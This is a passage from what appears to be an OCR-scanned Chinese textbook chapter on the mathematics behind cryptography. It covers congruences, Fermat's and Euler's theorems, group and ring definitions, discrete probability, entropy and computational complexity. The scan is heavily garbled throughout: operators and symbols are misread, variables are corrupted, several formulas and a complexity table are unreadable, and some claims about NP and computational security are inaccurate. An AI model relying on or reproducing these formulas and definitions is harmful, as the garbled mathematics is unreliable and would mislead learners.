@ 如 果 ac=bd modn 且 c=d mod mgcd (c, 7n)=1, 则 a=b mod n。 


2.1.3 同 余 式 


定义 2.4 设 a.b 为 整数 ,m 为 正 整数 , 若 a 与 0 关于 模 m 不 同 余 , 则 称 ax 十 b 夺 0(mod 
m) 为 模 mm 的 一 次 同 余 式 。 

定理 2.6 设 c 是 满足 az 十 2 二 0(Cmod m) 的 一 个 整数 , 即 成 立 cc 十 po=0Cmod mm), 则 满 
足 zx 三 c(mod m) 的 一 切 整数 x 都 满足 az 十 5 三 0(mod m)。 换 言 之 ,车 c 满足 az 十 2=0 
(mod m), 则 c 模 mm 的 同 余 类 (满足 z+ 三 c(mod m) 的 一 切 整 数 xz) 满足 wz 十 2 三 0Cmod m)。 

证 明 : 由 x 三 c(mod m) 及 定理 2.4 得 xz=c 十 km, 于 是 ax 十 b 三 a(c 十 km) 十 b 三 ac 十 b 
(mod m)。 由 于 ac 十 6 三 0(mod mp) ,所 以 az 十 2 三 0(Cmod m)。 

定义 2.5 车 c 满足 azr 十 b 三 0(mod mm), 则 称 c 模 wm 的 同 余 类 为 一 次 同 余 式 axr 十 b 三 0 
(mod m) 的 解 。 

例 2.3 求 3z 十 5 三 0(mod 7) 的 解 。 

解 : 取 c==3, 则 3X3 十 5 三 0(mod 7), 因 而 3 模 7 的 同 余 类 ( 即 满足 zx 三 3(mod 7) 的 一 切 
整数 z){…, 一 18, 一 11, 一 4,3,10,17,…} 为 一 次 同 余 式 3+ 十 5 三 0(mod 7) 的 解 。 显 然 {…， 
一 18, 一 11, 一 4,3,10,17,…} 可 由 3 十 km( 二 7) ,k= 二 0, 土 1 ,十 2,…, 所 生成 。 

定理 2.7 设 (a,m) 二 d 记 1 且 b 不 是 d 的 整 倍数 , 则 一 次 同 余 式 azt 十 b 三 0(mod m) 
无 解 。 

证 明 : 其 实 , 若 存在 整数 c ,满足 ac 十 6 三 0(mod m) , 则 由 定理 2.4 得 ac=6 十 km 即 0 一 
ac 一 km, 从 (a,m) 二 d 得 dla 且 d|m, 因 而 d165, 这 与 5 不 是 4 的 整 倍 数 矛 盾 。 所 以 一 次 同 
余 式 azt 十 6 三 0(mod m) 无 解 。 

例 2.4 求 2+ 十 179 寺 0(mod 562) 的 解 。 

解 : 由 (2, 562) 二 2 及 179 不 是 2 的 整 倍数 知 , 一 次 同 余 式 2t 十 179 寺 0(mod 562) 
无 解 。 

定理 2.8 车 (a, m) 二 1, 则 一 次 同 余 式 cz 十 =0Cmod m) 有 解 。 

证 明 : 因为 (a, m) 二 1, 所 以 存在 整数 ; 与 上 ,使 得 sa 十 tm 二 1 成 立 , 于 是 有 sab 十 tmb 二 
5, 即 asb 二 6 十 (一 tb)m, 这 也 就 是 说 ,a (sb) 寺 b(mod m), 即 一 次 同 余 式 cz 十 2 二 0Cmod m) 
有 解 。 

定理 2.9 设 d 关 0 且 ad 三 bd (mod md), 则 a 三 b(mod m)。 

证 明 : 由 ad 夺 bd(mod md) 及 定理 2.4 知 , 存 在 整数 k 使 有 ad 二 bd 十 kmd, 但 d 隆 0, 所 
以 a=b 十 km, 因 而 a 三 b(mod m)。 


定理 2.10 设 ac=pc(Cmod z2) 且 (cm) 一 d, 则 a 三 b(mod m/d)。 


证 明 : 由 ac 夺 bc(mod za) 知 ,za| (ac 一 pc) 即 关 | (a 一 Dec, 但 (ec, m) 二 d, 所 以 (xm/d)| 


[Ga 一 0)c/d] ,鉴于 (my/d c/d)==1, 故 有 (Gm/d)|(a 一 b) ,此 即 a 寺 b(mod m/d)。 


定理 2.11 设 (a,m) 二 d1 且 415; 则 一 次 同 余 式 az 寺 b(mod m) 有 4d 组 解 ,它们 是 : 
[zj,[z 二 Tm/dj,[zx 十 2m/dj,…,[zx 十 (d 一 1)m/dj, 式 中 [zj 为 一 次 同 余 式 (a/d)z 三 b/d 
(mod m/d) 的 解 (0 志 xz 二 m/d),[z 十 im/dj,i 二 1,2,…,(d 一 1), 意 指 给 (a/d)z 三 b/d (mod 


m/d) 的 解 a/d 模 m/d 的 同 余 类 [zx] 中 的 每 个 整数 元 素 加 上 整数 im/d。 
2.1.4 费 马 小 定理 和 欧 拉 定 理 


定理 2.12 费 马 小 定理 : 若 p 为 素数 日 gcd(a, p) 二 1, 则 有 co 和 :mod p 夺 1(mod p)。 

证 明 : 因为 {a mod p,2a mod p,…,(p 一 1)a mod p}) 是 {1,2,…,(p 一 1)) 的 置换 形式 ， 
所 以 ,az2az … zx((p—1)a)[(a mod p)zx(2a mod p)x * zx((p—1)a mod p)] mod p= 
(p—1)! mod p,B azx2azr … zx((p—1)a)=(p 一 1)1 ar!, 因 此 ,(p 一 1)! at ! 圭 (p 一 1)! 


mod p ,两边 去 掉 (p 一 1)1, 即 得 a* 1!mod p= 二 1。 


例 : a 二 7,p 二 19; 由 模 运算 的 基本 定理 得 : 7? 二 49 圭 11 mod 19,7* 圭 7 mod 19， 


所 以 


arl=7»=7*Xx7=7X1l=]1 mod 19 
费 马 小 定理 等 价 形式 : p 为 素数 , 则 有 a? 夺 a mod p。 
例 2.5 p=5,4a=3,35 二 243 三 3 mod 5 
p= 5,.a=10,.10 = 100000=10 mod5==0 mod5 


欧 拉 函数 : B(m) 是 比 n 小 且 与 4 互 素 的 正 整 数 的 个 数 , 即 模 的 剩余 系 中 元 素 之 个 数 。 


定理 2.13 nn 二 pg,p 和 g 是 素数 ,8B(n) 一 B(p) @B(g) 二 (p 一 1)(g 一 1)。 
定理 2.14 欧 拉 定 理 : 若 gcd(a, n) 二 1, 则 有 a”” mod n 夺 1(mod n)。 


欧 拉 定理 的 等 价 形式 : aaf+= a (mod n) ,其 中 ==pg,p 和 g 是 素数 ,k 是 整数 ,a 是 


小 于 nn 的 整数 。 


2.2 抽象 代数 基础 


本 小 节 介 绍 抽象 代数 基础 知识 ,主要 是 群 的 一 些 基本 概念 。 


定义 2.6 ( 群 (Group)) 设 集合 G 和 二 元 运算 。 称 为 群 (G,.), 如 果 运 算 满 足 如 下 


条 件 : 
。 封闭 性 一 一 对 任意 a.5EG, 有 (a* 0b)EG。 
。 结合 性 一 一 对 任意 a,b,cEG, 有 (a*6)。c=a* (b*c)。 
。 单位 性 一 一 存在 单元 e, 使 得 对 于 任意 a€EG, 都 有 a * ee* a 二 a。 
。 道 元 一 一 对 任意 a€G, 都 有 道 元 a ,使 得 cc 一 ca 一 e。 
在 表示 群 (G， ) 时 ,通常 省 略 运算 符号 ， ,用 G 来 表示 一 个 群 。 


定义 2.7 ( 阿 贝尔 群 (Abelian Group)): 若 对 任意 a.b5EG 有 a*5 一 6a, 则 称 G 为 


阿 贝尔 群 或 交换 群 。 


定义 2.8 〈 阶 (Order)): 群 G 中 元 素 的 个 数 叫 做 该 群 的 阶 , 用 |G | 表示。 若 1G| 是 有 限 
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的 ,那么 称 G 为 有 限 群 ,否则 被 称 为 无 限 群 。 

定义 2.9 (循环 群 (Cyclic Group)): 若 存在 一 个 元 素 g€G, 使 得 对 于 任意 5E€G 都 存 
在 一 个 整数 i€EZ, 满 足 6 二 g', 则 称 G 为 一 个 循环 群 。 其 中 ,g 称 为 G 的 生成 元 (generator) 。 
特别 地 ,如 果 群 G 的 阶 为 素数 ,那么 该 群 中 任意 非 单位 元 均 为 生成 元 。 

如 果 G 的 子 集 互 在 G 中 定义 的 元 素 操 作 意 义 下 也 构成 群 ,那么 称 互 为 群 G 的 子 群 。 
显然 ,单位 元 1€ 昌 ,对 于 a, bE 日 ,那么 ab,a !1EH。 并且 | 昌 | 整除 |G|。 

定义 2.10 已 知 集合 尺 ,定义 R 中 元 素 的 加 法 (十 ) 和 乘法 (X ) 操 作 使 其 满足 以 下 3 个 
条 件 : 

(1) CR; 十 ) 是 一 个 交换 群 。 

(2) 乘法 XxX 满足 结合 律 。 

(3) 运算 X 对 于 十 是 可 分 配 的 。 

那么 , 称 这 样 的 系统 为 环 。 记 为 (R; 十 ,X)。 

称 加 法 运算 十 的 单位 元 为 零 元 (0)。 对 于 乘法 运算 xX , 若 存在 单位 元 , 则 称 它 为 环 的 单 
位 元 , 记 作 1。 

定义 2.11 如 果 环 (R; 十 ,X) 含 有 非 零 元 素 和 单位 元 ,每 一 个 非 零 元 素 都 有 乘法 逆 元 
且 满 足 交换 律 , 那 么 称 (R; 十 ，X ) 为 一 个 域 。 

常见 的 3 大 数 域 为 有 理 数 域 Q、 实 数 域 R 和 复数 域 C。 有 理 数 域 是 最 小 的 数 域 ,任何 数 
域 都 包含 有 理 数 域 作 为 它 的 一 部 分 。 有 限 群 的 概念 可 以 直接 推广 到 域 和 环 。 


2.3 离散 概率 基础 


概率 是 研究 随机 事件 出 现 的 可 能 性 的 数学 分 支 ,描述 非 确 定性 (Uncertainty) 的 正式 请 
,是 统计 推断 的 基础 。 概 率 主要 研究 一 个 事件 或 事件 集合 出 现 的 可 能 性 ,其 基本 问题 是 给 
以 一 个 数据 产生 过 程 , 则 输出 的 性 质 是 什么 ?。 

1. 随机 实验 

满足 下 列 3 个 条 件 的 试验 称 为 随机 试验 : 

(1) 可 重复 性 一 一 试验 可 在 相同 条 件 下 重复 进行 。 

(2) 可 预知 性 一 一 试验 的 可 能 结果 不 止 一 个 , 且 所 有 可 能 结果 是 已 知 的 。 

(3) 随机 性 一 一 每 次 试验 哪个 结果 出 现 是 未 知 的 。 随 机 试验 简称 为 试验 ,并 常 记 为 EE。 

2. 随机 事件 

在 试验 中 可 能 出 现 也 可 能 不 出 现 的 事情 称 为 随机 事件 : 常 记 为 A,B,C…。 

3. 必然 事件 与 不 可 能 事件 

每 次 试验 必 发 生 的 事情 称 为 必然 事件 。 每 次 试验 都 不 可 能 发 生 的 事情 称 为 不 可 能 事 
件 , 记 为 8。 

4. 基本 事件 
试验 中 直接 观察 到 的 最 简单 的 结果 称 为 基本 事件 。 


障 划 


@ 与 统计 推断 的 区 别 : 统计 推断 是 处 理 数据 分 析 和 概率 理论 的 数学 分 支 ,其 基本 问题 是 给 定 输出 数据 ,可 以 得 到 
该 数据 的 产生 过 程 的 那些 信息 。 


5. 样本 空间 

从 集合 观点 看 , 称 构 成 基本 事件 的 元 素 为 样本 点 , 常 记 为 w。 例 如 ,在 E, 中 ,用 数字 1， 
2,…,6 表示 掷 出 的 点 数 ,而 由 它们 分 别 构成 的 单 点 集 {1},{2},…:,{6} 便 是 E, 中 的 基本 事 
件 。 在 E, 中 ,用 五 表示 正面 ,TT 表示 反面 ,此 试验 的 样本 点 有 (H,H),(H,7T),(T,H)， 
(T,T) ,其 基本 事件 便 是 {(H, 昌 )},{(H,T)},{(T, 晶 )},{(T,T)}。 显 然 ,任何 事件 均 为 
某 些 样 本 点 构成 的 集合 。 例 如 ,在 E, 中 * 掷 出 偶数 点 ”的 事件 便 可 表 为 {2,4,6}。 试 验 中 所 
有 样本 点 构成 的 集合 称 为 样本 空间 , 记 为 Q。 

6. 概率 

样本 空间 2 是 一 个 有 限 或 者 可 数 的 集合 。Q 中 的 一 个 元 素 w 就 称 为 元 素 事件 ,而 0 的 
一 个 子 集 A 就 称 为 事件 。 设 有 随机 试验 , 若 当 试验 的 次 数 充分 大 时 ,事件 的 发 生 频 率 稳定 
在 某 数 附近 摆动 , 则 称 该 数 为 事件 的 概率 (Probability) ,其 概率 函数 Pr 将 0 的 一 个 子 集 映 
射 为 一 个 大 于 等 于 0 小 于 等 于 1 的 实数 。 其 满足 下 面 的 条 件 : 

(1) 0<Pr[AJ<1 AE€EQ, 

(2) Pr[@®]=0,。 

(3) Pr[0QJ=1。 

(4) 如 果 ASB, 则 PrLA] 委 PrLB]。 

(5) Pr[AUB]=Pr[A]+Pr[B]—PrL[ANMB]。 

(6) 如 果 Pr[A 门 Bj 二 Pr[A]。Pr[Bj, 则 称 两 个 事件 A 和 B 独立 。 

7. 条 件 概率 的 概念 

在 已 知事 件 B 发 生 条 件 下 ,事件 A 发生 的 概率 称 为 事件 A 的 条 件 概率 , 记 为 PrL A | B]。 
条 件 概率 Pr[ A | B ] 与 无 条 件 概率 Pr[A] 通 常 是 不 相等 的 。 

8. 条 件 概率 的 定义 


_ PrL[ANMB] 
Pr[4 | B] 一 一 二 FB] “如果 Pr[B]>0) (2-1) 
如 果 随 即 变量 X 的 取 值 范围 为 x, 则 随机 变量 X 的 数学 期 望 为 : 
EL[X] = 2)zPr[X = z] (2-2) 
EX 
随机 变量 X 的 方差 为 : 
Var[X] = EL(X— ELXJ)] = ELX*J]—ELXJ (2-3) 


2.4 信息 论 基础 


在 本 节 中 ,log(z) 是 指 以 2 为 底 的 对 数 , 设 X 是 一 个 随机 变量 X :2 一 X, 其 概率 分 布 为 
Px,Y 是 一 个 随机 变量 Y:2 一 T, 其 概率 分 布 为 Py 。 
1. 香农 炉 
香农 公式 : 随机 变量 X 的 香农 炉 定 义 为 
H(X) = 一 >)Px(z)logPx(z) = Ex[— logPx (zx)] (2-4) 
EY 


香农 五 (X) 用 来 衡量 一 个 随机 变量 X 的 每 次 出 现 所 携带 的 平均 信息 量 。 它 衡量 了 X 的 
平均 不 确定 度 。 如 果 存 在 一 个 z+ 使 得 Px(z) 二 1, 那 么 关于 X 的 不 确定 度 达到 最 小 值 0; 当 
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1 


X 是 均匀 分 布 时 , 即 Px(z) 一 "(xED, 那 么 关于 X 的 不 确定 度 达到 最 大 值 log |X|。 
2. 条 件 坑 
在 随机 变量 Y 给 定 的 情况 下 X 的 条 件 炉 的 定义 : 
H(X IY)= Er[HCXIY= »]=— DPy(ylogH(X |Y = y) (2-5) 
?ET 
其 中 的 瓦 CXIY 一 y) 由 概率 分 布 Pxly-, 来 决定 。 
3. 联合 和 
随机 变量 X 和 Y 之 间 的 联合 炉 定 义 为 
HOCX,Y) = 一 >) Dp (zy logp(z,y) (2-6) 
xEX YE 了 
互信 息 量 : 随机 变量 X 和 Y 之 间 的 互信 息 量 定义 为 
I(X;Y) = H(X)— H(X |Y) = H(Y)— H(Y | X) (2-7) 


互信 息 量 用 来 衡量 两 个 随机 变量 之 间 的 关联 性 。 如 果 互信 息 量 为 0, 则 称 这 两 个 随机 
变量 无 关 。 

以 上 的 公式 都 是 针对 离散 随机 变量 X 和 YY 的 。 下 面 给 出 针对 连续 随机 变量 XX 和 YY 的 
对 应 的 公式 。 


4. 香农 焕 
HCX) = 一 | pologpCz)dz (2-8) 
5. 条 件 炳 
HX |Y) =— ||pc, wlogp(r [二 (2-9) 
6. 联合 人 
HCX,Y) =— ||pc, wlogp (ry drdy (2-10) 
7. 互信 息 量 
HCX |Y) =—||pcwpey | zlog 2 DED drdy (2-11) 
8. 信道 容量 


假设 将 一 个 随机 变量 X 输入 一 个 信道 ,信道 的 输出 用 另 一 个 随机 变量 Y 来 定义 。 这 
样 ,这 个 信道 的 所 有 信息 都 可 以 用 Py| X 来 表述 ,这 个 信道 的 信道 容量 定义 如 下 : 
ClPy | X) = maxl1(X;Y) 


2.5 计算 到 底 有 多 难 : 复杂 性 理论 基础 


2.5.1 基本 概念 


计算 复杂 性 理论 提供 一 种 根据 解决 问题 的 算法 所 需 资源 (时 间或 者 空间 ) 来 对 其 进行 分 
类 的 机 制 。 计 算 复 杂 性 理论 是 现代 公 钥 密 钥 学 的 重要 理论 基础 , 它 为 公 钥 密码 学 所 使 用 的 
数学 困难 问题 提供 了 一 个 统一 的 衡量 标准 。 


问题 (problem) : 在 计算 机 上 求解 的 对 象 称 为 问题 。 问 题 的 描述 由 以 下 两 部 分 构成 : 

(1) 给 定 所 有 自由 变量 的 一 般 性 描述 。 

(2) 陈述 “答案 ”或 “ 解 ” 必 须 满足 的 性 质 。 

问题 的 规模 (size) : 定义 为 求解 该 问题 的 算法 所 需 输入 数据 的 长 度 (比如 bit 数 ) ,通常 
用 表示 。 

实例 (instance) : 如 果 给 问题 的 所 有 自由 变量 都 指定 了 具体 的 值 ,就 得 到 该 问题 的 一 个 
实例 。 

定义 2.12 (算法 ): 指 求解 某 个 问题 的 一 系列 具体 步骤 ,并 且 要 能 在 运行 了 有 限时 间 
(或 运算 步 ) 之 后 给 出 “答案 ”, 然 后 “停机 ?终止 。 

若 一 个 算法 对 于 某 个 固定 的 输入 , 它 每 次 执行 的 步骤 是 固定 的 ,那么 我 们 称 它 为 确定 性 
算法 。 与 此 对 应 ,一 个 概率 算法 对 于 某 个 固定 的 输入 , 它 每 次 执行 的 步骤 可 能 是 不 同 的 。 

如 果 算 法 A 可 以 求解 问题 Q 的 任何 一 个 实例 ,并 且 答案 的 正确 率 超过 50% ,那么 就 称 
算法 A 能 解 问题 Q。 通 常 按 程 序 设计 的 习惯 将 给 定 的 自由 变量 称 为 算法 的 “输入 ”, 将 “ 答 
案 ? 或 “ 解 ? 称 为 算法 的 “输出 ”。 

算法 常常 含有 重复 的 步 又 和 一 些 比较 或 逻辑 判断 。 如 果 一 个 算法 有 缺陷 ,或 不 适合 于 
某 个 问题 ,执行 这 个 算法 将 不 会 解决 这 个 问题 。 不 同 的 算法 可 能 用 不 同 的 时 间 空间 或 效率 
来 完成 同样 的 任务 。 一 个 算法 的 优 劣 可 以 用 空间 复杂 度 与 时 间 复 杂 度 来 衡量 。 

一 个 简单 而 且 耳 熟 能 详 的 算法 的 例子 是 求 最 大 公约 数 的 思 转 相 除 法 : 给 出 两 个 数 , 要 
求 出 他 们 俩 的 最 大 公约 数 。 通 常 我 们 可 以 这 样 做 : 将 大 数 除 以 小 数 ,用 所 得 余数 蔡 换 大 数 ， 
继续 用 这 两 个 数 中 大 者 除 以 小 者 ,用 所 得 余数 替换 较 大 者 ,继续 下 去 ,直到 所 得 余数 为 0, 此 
时 除数 即 为 所 求 的 最 大 公约 数 。 又 如 ,要 判断 某 个 数 是 否 为 质数 ,只 需 枚 举 所 有 比 它 小 的 
数 ,检验 是 否 其 约 数 即 可 。 

算法 是 理论 计算 机 的 灵魂 。 几 乎 所 有 问题 都 围绕 它 而 来 。 为 了 讨论 算法 的 性 质 , 在 理 
论 计算 机 中 ,算法 已 不 限于 只 是 上 面 定 义 中 的 计算 机 程序 , 即 这 里 “计算 机 ”的 含义 被 大 大 扩 
展 了 。 

定义 2.13 〈 阶 号 ) : 对 于 两 个 函数 f(n) 和 g(n) ,车 存在 一 个 常数 c 二 0 和 一 个 正 整 数 
NN ,使 得 对 于 所 有 有) 二 N, 都 有 0 三 fn) 三 cg (1), 则 称 f(x) 二 Ol(g(n))。 

定义 2.14 (可 忽略 函数 (Neghgible)): 称 函 数 e(n) 是 可 忽略 的 ,如 果 对 于 任意 多 项 式 


p(。) ,总 存在 一 个 自然 数 N, 使 得 对 于 所 有 n Ne < ty: 


定义 2.15 (不 可 忽略 函数 (Non-negligible)): 称 函数 f 是 不 可 忽略 的 ,如 果 f 不 是 可 
忽略 的 。 

定义 2.16 ( 非 多 项 式 函 数 (Polynomial) ) : 称 函 数 f(n) 为 非 多 项 式 界 的 ,如 果 对 于 任 
意 多 项 式 p(， ) ,总 存在 一 个 自然 数 NN, 使 得 对 于 所 有 nn 二 N ,都 有 Fo 二 总 2) 。 称 函数 
了 (nn) 为 多 项 式 界 的 ,如 果 它 不 是 非 多 项 式 界 的 。 

定义 2.17 (概率 多 项 式 时 间 (PPT) 算 法 ): 称 一 个 算法 为 概率 多 项 式 时 间 算 法 ,如 果 
它 是 一 个 概率 算法 并 且 运 行 时 间 T(n) 是 多 项 式 界 的 。 

定义 2.18 (有 效 算法 ): 称 一 个 算法 为 有 效 算法 ,如 果 它 是 一 个 概率 多 项 式 时 间 算 法 
并 且 它 的 成 功 概率 p(n) 是 不 可 忽略 的 。 
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定义 2.19 (多 项 式 时 间 不 可 区 分 ) 两 个 概率 总 体 X 和 了 是 多 项 式 时 间 不 可 区 分 的 ， 
如 果 对 每 个 以 (a,1" ,X,Y) 为 输入 的 概率 时 间 算法 D, 其 中 EkX 或 4 ERY; 当 cERX 时 ， 
吃 输 出 1, 当 a€ErY 时 ,D 输出 0; 那么 对 于 任意 一 个 多 项 式 p(，… ) 都 有 足够 大 的 ,存在 6， 
使 得 二 6 时 满足 : 

LPiD(ay ry XE) = 1 1ae XI]— PilDtasl, XY) = 1|a€eY¥] I< 7 

近代 密码 分 析 学 取决 于 攻击 方法 在 计算 机 上 编程 实现 时 所 需 的 计算 时 间 ( 时 间 复 杂 度 ) 
和 占用 的 硬件 资源 (空间 复杂 度 )。 如 果 用 表示 问题 的 大 小 /输入 的 长 度 , 计 算 复杂 性 可 用 
两 个 参数 来 表示 : T(n) 和 S(n)。 如 果 T(n) = 二 O(n) (ec 二 0), 则 称 该 算法 是 时 间 多 项 式 
的 ; 如 果 (x) 二 O(a*w) (a 二 0), 则 称 该 算法 是 时 间 指 数 级 的 ,其 中 p(n) 是 一 个 多 项 式 。 
如 果 一 个 算法 是 时 间 指 数 级 的 , 则 认为 是 计算 上 安全 的 。 确 定性 算法 和 不 确定 性 算法 的 区 别 
在 于 算法 的 每 一 步 操作 结果 是 否 确 定 。 一 些 操作 与 计算 复杂 度 的 关系 如 表 2. 1 所 示 。 


表 2.1 操作 与 计算 复杂 度 


操 作 按 位 计算 复杂 度 操 作 按 位 计算 复杂 度 
二 Oe milg DD=0(e ed Odg nm) 
i Odg milg w=00e PE ee OCGg 2) 
mn O(lg mlg n)=O(lg m)’* :CCmod n) Ol((lg m)’) 
n=am++r Ollg m lg n)=O(lg n)’ a/b(mod n) O((lg mm’) 
a’ (mod n) O((lg n)’) 


注 :; mn 
awb 小 于 nn 


2.5.2 计算 模型 与 判定 问题 


平时 所 说 和 所 使 用 的 计算 机 ,是 基于 图 灵 提 出 的 确定 型 图 灵机 模型 的 。 确 定型 图 灵机 
的 特点 是 : 给 出 固定 的 程序 ,模型 按照 程序 和 输入 完全 确定 性 地 运行 。 确 定型 图 灵机 每 一 
步 的 操作 结果 均 是 唯一 的 。 

为 了 理解 算法 和 这 种 确定 型 图 灵机 的 能 力 , 人 们 又 发 展 了 许多 其 他 各 式 各 样 的 图 灵机 
模型 ,其 中 最 为 有 名 的 是 非 确定 型 图 灵机 。 这 种 计算 模型 在 进行 计算 的 时 候 , 会 自动 选择 最 
优 路 径 进 行 计算 。 因 此 , 非 确定 型 图 灵机 每 一 步 的 操作 结果 及 下 一 步 的 操作 有 多 种 选择 ,不 
是 唯一 确定 的 。 

确定 型 和 非 确定 型 图 灵机 的 计算 性 能 所 引起 的 P 和 NP 问题 ,一 直 是 理论 计算 机 科学 
的 核心 问题 。 

另 一 个 引起 广泛 关注 的 计算 机 模型 是 量子 计算 机 模型 。 与 上 面 的 非 确 定型 图 灵机 只 存 
在 于 人 们 的 想象 中 不 同 ,量子 计算 机 在 物理 上 是 可 以 实现 的 。 

虽然 上 面 的 各 种 计算 模型 的 效率 可 能 不 同 , 如 非 确定 性 图 灵机 判定 一 个 数 是 合 数 便 要 
快 得 多 ,但 是 它们 的 计算 能 力 是 完全 一 样 的 。 也 就 是 在 某 个 计算 模型 上 面 运行 的 算法 ,可 以 
被 其 余 模 型 模拟 实现 。 

与 计算 模型 和 复杂 性 类 有 重要 关系 的 一 个 概念 是 判定 问题 。 判 定 问题 (Decision 
Problem) 是 无 穷 多 个 同类 个 别 问题 的 总 称 。 例 如 ,3 是 不 是 素数 ? 9 是 不 是 素数 ? 这 些 都 


是 个 别 问题 ,把 这 类 个 别 问题 概括 起 来 ,就 得 到 一 个 判定 问题 : 任意 给 定 的 正 整数 是 不 是 素 
数 ? 这 里 的 正 整 数 集合 称 为 该 判定 问题 的 域 ,给 定 域 中 的 一 个 元 素 ,判定 问题 就 对 应 一 个 个 
别 问 题 。 问 题 的 解 是 指 判断 这 一 类 问题 中 的 每 一 个 是 否 具 有 某 种 性 质 , 或 判断 它们 中 的 每 
一 个 是 真 还 是 假 。 如 果 能 找到 一 种 有 效 可 行 的 算法 ,以 域 中 任意 元 素 作为 输入 ,依据 这 种 算 
法 ,一 类 问题 中 的 每 一 个 都 可 以 有 确定 解 ,就 称 这 一 类 问题 是 可 判定 的 ; 否则 就 称 这 一 类 问 
题 是 不 可 判定 的 。 例 如 ,“ 任 意 正 整数 是 不 是 素数 ”这 个 问题 就 是 可 判定 的 。 对 于 集合 A , 域 
中 任意 元 素 是 否 属于 它 的 问题 称 为 集合 A 对 应 的 判定 问题 。 

一 般 说 来 ,证 明 一 类 问题 是 可 判定 的 比较 容易 ,只 要 找 出 解 这 类 问题 的 一 种 算法 ,但 要 
证 明 一 类 问题 是 不 可 判定 的 就 比较 困难 。 要 证 明 任何 一 种 算法 都 不 能 判定 某 一 类 问题 , 首 
先 必须 给 算法 下 一 个 严格 的 精确 的 定义 。 这 就 要 用 到 递归 函数 和 递归 论 的 方法 ,用 递归 论 
的 方法 可 以 把 一 类 问题 可 行 地 化 为 自然 数 集 的 某 个 子 集 。 集 合 是 递归 集 的 充分 必要 条 件 为 
对 应 的 判定 问题 是 可 判定 的 。 于 是 判定 这 一 类 问题 就 变 为 判定 这 个 子 集 是 否 为 递归 集 。 如 
果 这 一 子 集 不 是 递归 集 , 则 这 一 类 问题 就 是 不 可 判定 的 。 利 用 递归 论 方法 ,许多 问题 被 证 明 
是 不 可 判定 的 。 例 如 群 的 子 问 题 . 丢 番 图 方程 解 的 问题 .一 阶 逻 辑 公式 的 可 满足 性 问题 都 被 
证 明 是 不 可 判定 的 。 

已 知 一 些 可 判定 的 和 不 可 判定 的 问题 后 , 归 约 就 是 判定 问题 的 一 种 重要 而 有 效 的 方法 
了 。 把 未 知 的 一 类 问题 的 解 化 归 到 一 类 已 知 的 问题 的 解 就 是 归 约 的 方法 。 如 果 工 和 了 是 
两 类 问题 ,六 中 的 每 个 问题 的 解 都 能 化 归 到 了 中 某 个 问题 的 解 ,就 记 作 T' 夺 TT。 这 时 如 果 
工 是 可 判定 的 ,那么 T' 也 是 可 判定 的 ; 如 果 并 是 不 可 判定 的 ,那么 工 也 是 不 可 判定 的 。 


2.5.3 复杂 性 类 


计算 复杂 性 (Complexity) 的 概念 , 源 于 20 世纪 30 年 代数 学 逻辑 的 一 些 深刻 命题 。 所 
谓 计算 复杂 性 ,通俗 说 来 ,就 是 用 计算 机 求解 问题 的 难 易 程度 。 其 度量 标准 : 一 是 计算 所 需 
的 步 数 或 指令 条 数 (时 间 复 杂 度 ) ,二 是 计算 所 需 的 存储 单元 数量 (空间 复杂 度 )。 通 常情 况 
下 ,不 可 能 也 不 必要 就 一 个 个 具体 问题 去 研究 它 的 计算 复杂 性 ,而 是 依据 难度 去 研究 各 种 计 
算 问 题 之 间 的 联系 , 按 复杂 性 把 问题 分 成 不 同 的 类 , 即 计算 复杂 性 类 (Complexity Class) 。 

1. PNP 和 NP 完全 

(1) P 问题 类 : 多 项 式 时 间 内 可 以 用 确定 性 算法 求解 的 问题 称 为 P 问题 类 。 

(2) NP 问题; 多项式 时 间 内 可 以 用 非 确定 性 算法 可 判别 的 问题 称 为 NP 问题 类 (猜测 
十 验证 ) 。 

(3) NPC 问题 类 : NP 问题 类 中 的 某 些 问题 的 复杂 性 与 整个 类 的 复杂 性 相关 联 。 这 些 
问题 中 任何 一 个 如 果 存 在 多 项 式 时 间 算 法 .那么 所 有 NP 问题 都 是 多 项 式 时 间 可 解 的 。 

每 个 问题 都 有 其 特定 的 规模 N ,如 货 郎 担 问题 有 必须 访问 的 村 庄 数目 ,或 是 需要 求 逆 
的 矩阵 的 阶 。 解 决 问题 所 需 的 代价 (如 计算 时 间 ) ,如 何 随 问题 规模 N 变 大 而 增长 ? 若 代 价 
的 增长 不 超过 NN 的 某 个 客 次 多 项 式 , 该 问题 是 简单 的 ,属于 P( 即 多 项 式 ) 类 。 若 增长 速率 
超过 N 的 任何 多 项 式 , 则 问题 是 困难 的 ,属于 NP 类 。 严 格 地 说 , 若 已 知 某 NP 问题 的 解 ,可 
付出 P 类 代价 加 以 证 实 ; 但 若 要 找到 这 个 解 , 则 须 付 出 NP 代价 。 简 而 言 之 ,P 类 问题 是 在 
多 项 式 时 间 内 可 以 解决 的 问题 而 NP 类 问题 则 是 多 项 式 时 间 内 可 以 验证 的 问题 。 

若 两 个 NP 问题 可 用 尸 代 价 彼此 转换 , 则 它们 是 同等 困难 的 。 这 些 等 价 的 NP 问题 构 
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成 所 谓 NP 完全 类 。 目 前 已 经 知道 上 千 个 NP 完全 问题 。NP 完全 性 的 研究 在 理论 上 有 重 
要 意义 。 已 经 证 明 , 只 要 有 一 个 NP 完全 问题 属于 P, 则 NP 中 一 切 问题 都 属于 P。 实 际 上 ， 
NP 中 任何 一 个 问题 都 可 以 多 项 式 时 间 归 约 到 这 个 NP 完全 问题 ,而 该 问题 又 可 在 多 项 式 时 
间 内 解决 , 故 NP 中 任何 问题 都 可 在 多 项 式 时 间 内 解决 。 因 此 ,只 要 能 证 明 任 何 一 个 NP 完 
全 问题 属于 尸 , 就 能 推出 NP 二 P。 这 将 导致 十 多 年 来 计算 机 科学 中 一 个 重大 问题 :“P 是 否 
等 于 NP” 的 肯定 性 解决 。 反 之 ,要 证 明 NP 天 已 ,一 个 明显 的 方法 ,就 是 到 NP 中 去 找 一 个 不 
属于 PP 的 问题 。 作 为 NP 中 “最 难 ” 问 题 的 NP 完全 问题 ,自然 是 最 有 希望 的 候选 对 象 。 总 
之 ,无 论 是 要 证 明 NP 二 P, 还 是 要 证 明 其 不 成 立 , NP 完全 问题 的 研究 ,都 是 很 有 意义 的 。 

下 面 是 几 个 著名 的 NP 完全 问题 : 

(1) 巡回 销售 员 问 题 也 称 货 郎 担 问题 。 假 定 有 一 个 销售 员 要 到 个 城镇 去 推销 产品 ， 
已 知 各 城镇 间 的 距离 和 一 个 界限 B。 问 是 否 有 一 条 旅行 路 线 ,恰好 通过 每 个 城镇 一 次 ,最 后 
回 到 出 发 点 , 且 使 旅行 路 线 的 总 长 不 超过 B。 

